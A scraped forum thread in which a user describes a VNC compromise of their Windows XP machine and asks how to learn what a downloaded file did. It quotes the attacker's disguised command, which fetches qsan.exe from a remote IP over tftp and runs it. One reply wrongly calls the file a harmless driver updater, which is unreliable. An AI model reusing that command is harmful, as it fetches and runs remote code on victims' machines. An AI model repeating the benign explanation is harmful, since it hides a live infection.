Solve : VNC HACKED!? – InterviewSolution

InterviewSolution

1.	Solve : VNC HACKED!?
Answer» OK, My home computer was hacked last night, I was working over VNC and I was sitting there taking a drink (of water..lol), and I noticed the task manager popped up, and the commandline popped up and this script started running... So I ripped out my wireless adapter, and tried to figure out what just happened... here is what I GOT. %comspec% /c ECHO Repairing user32.dll & echo Please wait... & tftp -i 75.5.227.42 GET qsan.exe & start qsan& Now I have some important stuff on my computer so I need to find a way to figure out what QSAN.EXE DID.. IS THERE A PROGRAM that can record or show all actions of a .exei cant find anything on the .exe FILE do a SYSTEM search and tell us where its located.. what protections do you have?? do you have a firewall?? have you installed any new software?C:\WINDOWS\system32 http://secunia.com/advisories/20107/ Regular XP Firewall and Symantec SAV Corp Ed.11.XXX WIN DEFENDER No new software...ummm did you install that program??Some more info that I found, but I just really need to know if anything taken that's why I want to know if there is anything that records what an .exe does. http://forums.spywareinfo.com/lofiversion/index.php/t95333.html I installed vnc,... what program exactly are you talking about?No I did not install the qsan.exe... it was pull from an tftp server from who ever comprimised my system.have you patched the program?Yes, but right now I'm just trying to figure out what that executable does, or did anything leave my computer.i was talking about the Vnc program the last reference you gave talked about patching it so try that to stop it from happening again.. if you want look at my signature and dl the programs you dont have and scan in safe mode..what windows do you have?? look in the program folder of the vnc and seee if that .exe is thereOk,.. i'm running windows XP Pro... Qsan.exe.. is not located in the programs folder .. it's located in c:\WINDOWS\system32 tftp -i 75.5.227.42 GET qsan.exe That was in the script that was ran... so it was pulled from somewhere.. QScan means your Beng burner is phoning home to look for the latest driver UPDATES... If you don't have a Beng burner than post back with more hardware info... If it's qsan then the same thing is happening but for a RAID or IDE controller card.Try uploading the file to VirusTotal and post the results here.Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged. If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.

Discussion

No Comment Found

Related InterviewSolutions